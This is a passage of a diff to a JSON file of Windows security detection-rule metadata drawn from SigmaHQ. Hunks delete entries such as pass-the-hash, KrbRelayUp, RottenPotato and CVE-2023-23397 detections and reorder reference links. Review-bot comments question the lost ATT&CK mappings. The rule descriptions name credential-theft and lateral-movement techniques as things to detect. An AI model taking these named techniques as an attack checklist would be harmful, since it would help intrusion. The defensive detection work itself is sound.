"value": "Impacket PsExec Execution"
},
- {
- "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2019/03/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_apt_slingshot.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/apt-slingshot/84312/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053",
- "attack.s0111"
- ]
- },
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7",
- "value": "Defrag Deactivation - Security"
- },
{
"description": "Detects remote service activity via remote access to the svcctl named pipe",
"meta": {
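Review bot: this deletion also drops the `related` link from `Defrag Deactivation - Security` to attack-pattern uuid `35dd844a-b219-4e2b-a6bb-efa9a75995a9`, which is what made the rule pivotable from the ATT&CK galaxy via its `attack.t1053` tag. The `refs` still name `rules/windows/builtin/security/win_security_apt_slingshot.yml`, so the same question applies: was the rule deleted upstream, or relocated out of that directory and simply not found by the generator?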
@@ -5811,9 +5754,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634",
"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml"
],
"tags": "No established tags"
@@ -5853,41 +5796,6 @@
"uuid": "098d7118-55bc-4912-a836-dc6483a8d150",
"value": "Access to ADMIN$ Share"
},
- {
- "description": "Detects the attack technique pass the hash which is used to move laterally inside the network",
- "meta": {
- "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)",
- "creation_date": "2019/06/14",
- "falsepositive": [
- "Administrator activity"
- ],
- "filename": "win_security_pass_the_hash_2.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
- "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
- "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1550.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b",
- "value": "Pass the Hash Activity 2"
- },
{
"description": "Detects renaming of file while deletion with SDelete tool.",
"meta": {
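Review bot: `Pass the Hash Activity 2` (uuid `8eef149c-bd26-49f2-9e5a-9b00e3af499b`) is removed while nothing in this diff touches a sibling pass-the-hash value. If upstream folded this rule into another, the three external refs in the deleted block (stealthbits, binarydefense, the iadgov Event-Forwarding-Guidance tree) are the documentation trail behind the `attack.t1550.002` mapping and should be carried over to the surviving value rather than lost; if the rule was retired, the commit message should say so.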
@@ -5901,8 +5809,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm",
"https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete",
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm",
"https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml"
],
@@ -5949,27 +5857,6 @@
"uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d",
"value": "Secure Deletion with SDelete"
},
- {
- "description": "Detects logon events that specify new credentials",
- "meta": {
- "author": "Max Altgelt (Nextron Systems)",
- "creation_date": "2022/04/06",
- "falsepositive": [
- "Legitimate remote administration activity"
- ],
- "filename": "win_security_susp_logon_newcredentials.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b",
- "value": "Outgoing Logon with New Credentials"
- },
{
"description": "Detects certificate creation with template allowing risk permission subject",
"meta": {
@@ -6030,74 +5917,6 @@
"uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7",
"value": "Register new Logon Process by Rubeus"
},
- {
- "description": "Detects activity mentioned in Operation Wocao report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), frack113",
- "creation_date": "2019/12/20",
- "falsepositive": [
- "Administrators that use checkadmin.exe tool to enumerate local administrators"
- ],
- "filename": "win_security_apt_wocao.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1207671369963646976",
- "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1012",
- "attack.defense_evasion",
- "attack.t1036.004",
- "attack.t1027",
- "attack.execution",
- "attack.t1053.005",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d",
- "value": "Operation Wocao Activity - Security"
- },
{
"description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.",
"meta": {
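Review bot: removing `Operation Wocao Activity - Security` takes five `related` mappings with it, and in this file the `related` block is the only machine-readable link between a sigma rule and ATT&CK, so a rule that has merely moved upstream should be regenerated with these links intact rather than dropped. Note also that the five `related` entries line up with the five technique tags (`attack.t1012`, `attack.t1036.004`, `attack.t1027`, `attack.t1053.005`, `attack.t1059.001`) and not with the three tactic tags; that is reasonable, but it is undocumented behaviour of the generator and worth a comment in it.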
@@ -6111,8 +5930,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://twitter.com/_dirkjan/status/1309214379003588608",
+ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://dirkjanm.io/a-different-way-of-abusing-zerologon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml"
],
@@ -6238,9 +6057,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://threathunterplaybook.com/library/windows/active_directory_replication.html",
"https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html",
- "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml"
],
"tags": [
@@ -6358,35 +6177,6 @@
"uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a",
"value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security"
},
- {
- "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n",
- "meta": {
- "author": "Alexandr Yampolskyi, SOC Prime",
- "creation_date": "2019/03/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_group_modification_logging.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e",
- "value": "Group Modification Logging"
- },
{
"description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares",
"meta": {
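Review bot: the value removed here is the one whose `refs` cite CIS Controls, PCI DSS v3.2.1 and the NIST CSF rather than a threat report, and whose description is audit-policy guidance for events 4728/4729/4730. If upstream reclassified it as a compliance rule instead of deleting it, the fix is to widen the generator's source path, not to drop the value; if it was deleted, say so in the commit so consumers know that the group-membership-change coverage left this cluster.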
@@ -6436,31 +6226,6 @@
"uuid": "910ab938-668b-401b-b08c-b596e80fdca5",
"value": "Transferring Files with Credential Data via Network Shares"
},
- {
- "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like",
- "meta": {
- "author": "@SBousseaden, Florian Roth",
- "creation_date": "2022/04/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_susp_krbrelayup.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
- "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.credential_access"
- ]
- },
- "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b",
- "value": "KrbRelayUp Attack Pattern"
- },
{
"description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986",
"meta": {
@@ -6508,8 +6273,8 @@
"logsource.product": "windows",
"refs": [
"https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
"https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
+ "https://github.com/fox-it/LDAPFragger",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml"
],
"tags": [
@@ -6650,9 +6415,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
"https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
"https://twitter.com/gentilkiwi/status/1003236624925413376",
- "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml"
],
"tags": [
@@ -6705,57 +6470,6 @@
"uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e",
"value": "DPAPI Domain Backup Key Extraction"
},
- {
- "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.",
- "meta": {
- "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
- "creation_date": "2023/01/19",
- "falsepositive": [
- "Legitimate or intentional inbound connections from public IP addresses on the SMB port."
- ],
- "filename": "win_security_successful_external_remote_smb_login.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
- "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_successful_external_remote_smb_login.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.credential_access",
- "attack.t1133",
- "attack.t1078",
- "attack.t1110"
- ]
- },
- "related": [
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "78d5cab4-557e-454f-9fb9-a222bd0d5edc",
- "value": "External Remote SMB Logon from Public IP"
- },
{
"description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME",
"meta": {
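Review bot: with this hunk and the `Failed Logon From Public IP` hunk further down, both public-source-IP logon values leave the file, and with them the `related` links for `attack.t1133` and `attack.t1078` (uuids `10d51417-ee35-4589-b1ff-b6df1c334e8d` and `b17a1a56-e99c-403c-8948-561df0cffe81`). The deleted `refs` still show `rules/windows/builtin/security/win_security_successful_external_remote_smb_login.yml`; if the rule was relocated upstream, regenerate from the new location, and if it was deleted, state in the commit message that no public-IP logon detection remains in this cluster.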
@@ -6769,8 +6483,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
"https://twitter.com/matthewdunwoody/status/1352356685982146562",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml"
],
"tags": [
@@ -6847,9 +6561,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616",
"Live environment caused by malware",
"Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml"
],
"tags": [
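Review bot: two of the four `refs` in this hunk are free text, `Live environment caused by malware` and `Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)`, not URLs. They are evidently copied verbatim from the rule's references, but any consumer that treats `refs` as links will produce dead anchors for them. Either filter non-URL entries when generating or move them to a separate free-text field.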
@@ -6910,56 +6624,6 @@
"uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed",
"value": "NetNTLM Downgrade Attack"
},
- {
- "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.",
- "meta": {
- "author": "NVISO",
- "creation_date": "2020/05/06",
- "falsepositive": [
- "Legitimate logon attempts over the internet",
- "IPv4-to-IPv6 mapped IPs"
- ],
- "filename": "win_security_susp_failed_logon_source.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.persistence",
- "attack.t1078",
- "attack.t1190",
- "attack.t1133"
- ]
- },
- "related": [
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1",
- "value": "Failed Logon From Public IP"
- },
{
"description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.",
"meta": {
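Review bot: the removed `Failed Logon From Public IP` value carried only the self-referential SigmaHQ URL in `refs`, so there is no external pointer to check the rule against, and its `falsepositive` list was the one place in this file that called out IPv4-to-IPv6 mapped addresses, which is the operational caveat a consumer loses with it. Its three `related` links (`b17a1a56-e99c-403c-8948-561df0cffe81`, `3f886f2a-874f-4333-b794-aa6075009b1c`, `10d51417-ee35-4589-b1ff-b6df1c334e8d`) go too; confirm moved versus deleted before merging.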
@@ -6993,40 +6657,6 @@
"uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b",
"value": "VSSAudit Security Event Source Registration"
},
- {
- "description": "RDP login with localhost source address may be a tunnelled login",
- "meta": {
- "author": "Thomas Patzke",
- "creation_date": "2019/01/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_rdp_localhost_login.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "car.2013-07-002",
- "attack.t1021.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31",
- "value": "RDP Login from Localhost"
- },
{
"description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.",
"meta": {
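Review bot: this deletion drops the only `car.2013-07-002` tag visible in this diff, i.e. the MITRE CAR analytic mapping for tunnelled RDP, together with the `related` link to `eb062747-2193-45de-8fa2-e62549c37ddf` (`attack.t1021.001`). If the rule moved upstream, regenerate rather than delete; if it was retired, mention the lost CAR mapping in the commit message.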
@@ -7060,64 +6690,6 @@
"uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51",
"value": "Password Change on Directory Service Restore Mode (DSRM) Account"
},
- {
- "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.",
- "meta": {
- "author": "Robert Lee @quantum_cookie",
- "creation_date": "2023/03/16",
- "falsepositive": [
- "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM"
- ],
- "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.initial_access",
- "cve.2023.23397"
- ]
- },
- "uuid": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c",
- "value": "CVE-2023-23397 Exploitation Attempt"
- },
- {
- "description": "Detection of logins performed with WMI",
- "meta": {
- "author": "Thomas Patzke",
- "creation_date": "2019/12/04",
- "falsepositive": [
- "Monitoring tools",
- "Legitimate system administration"
- ],
- "filename": "win_security_susp_wmi_login.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047"
- ]
- },
- "related": [
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5af54681-df95-4c26-854f-2565e13cfab0",
- "value": "Login with WMI"
- },
{
"description": "Detects Obfuscated use of stdin to execute PowerShell",
"meta": {
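Review bot: this hunk removes two values at once, and the first, `CVE-2023-23397 Exploitation Attempt`, is `critical`, tagged `cve.2023.23397` and dated 2023/03/16, so it is unlikely to have been retired for age. The `cve.*` tag is what lets an event tagged with that CVE pivot to the detection, and the link disappears here. The ref still shows `rules/windows/builtin/security/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml`, so check whether the upstream rule was moved and regenerate from its new path. The second value, `Login with WMI`, has only the self-referential SigmaHQ ref and a `related` link to `01a5a209-b94c-450b-b7f9-946497d91055` (`attack.t1047`); same question.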
@@ -7160,41 +6732,6 @@
"uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974",
"value": "Invoke-Obfuscation STDIN+ Launcher - Security"
},
- {
- "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)",
- "meta": {
- "author": "Michaela Adams, Zach Mathis",
- "creation_date": "2022/11/06",
- "falsepositive": [
- "Anti-Virus"
- ],
- "filename": "win_security_access_token_abuse.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
- "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1134.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f",
- "value": "Access Token Abuse"
- },
{
"description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.",
"meta": {
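Review bot: `Access Token Abuse` describes DuplicateToken(Ex)/ImpersonateLoggedOnUser with `LOGON32_LOGON_NEW_CREDENTIALS`, and the `Outgoing Logon with New Credentials` value deleted earlier in this diff covers the same new-credentials logon from the other side. If one of the two was deprecated upstream in favour of the other, both leaving the file means the coverage is gone entirely; if both moved, regenerate them. The uuid `02f7c9c1-1ae8-4c6a-8add-04693807f92f` and its `related` link to `86850eff-2729-40c3-b85e-c4af26da4a2d` (`attack.t1134.001`) should at least stay reserved with a deprecation marker rather than vanish.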
@@ -7240,8 +6777,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
"https://twitter.com/menasec1/status/1111556090137903104",
+ "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml"
],
"tags": [
@@ -7536,8 +7073,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649",
"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml"
],
"tags": "No established tags"
@@ -7559,9 +7096,9 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/SecurityJosh/status/1283027365770276866",
- "https://twitter.com/Flangvik/status/1283054508084473861",
"https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html",
"https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8",
+ "https://twitter.com/Flangvik/status/1283054508084473861",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml"
],
"tags": [
@@ -7874,9 +7411,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
"https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/",
"https://github.com/topotam/PetitPotam",
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml"
],
"tags": [
@@ -7909,8 +7446,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
"https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml"
],
"tags": [
@@ -8014,40 +7551,6 @@
"uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34",
"value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security"
},
- {
- "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like",
- "meta": {
- "author": "@SBousseaden, Florian Roth",
- "creation_date": "2019/11/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_susp_rottenpotato.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1195284233729777665",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.credential_access",
- "attack.t1557.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f",
- "value": "RottenPotato Like Attack Pattern"
- },
{
"description": "Detects service ticket requests using RC4 encryption type",
"meta": {
@@ -8062,8 +7565,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://adsecurity.org/?p=3458",
"https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity",
+ "https://adsecurity.org/?p=3458",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml"
],
"tags": [
@@ -8083,41 +7586,6 @@
"uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39",
"value": "Suspicious Kerberos RC4 Ticket Encryption"
},
- {
- "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "creation_date": "2020/09/02",
- "falsepositive": [
- "SCCM"
- ],
- "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
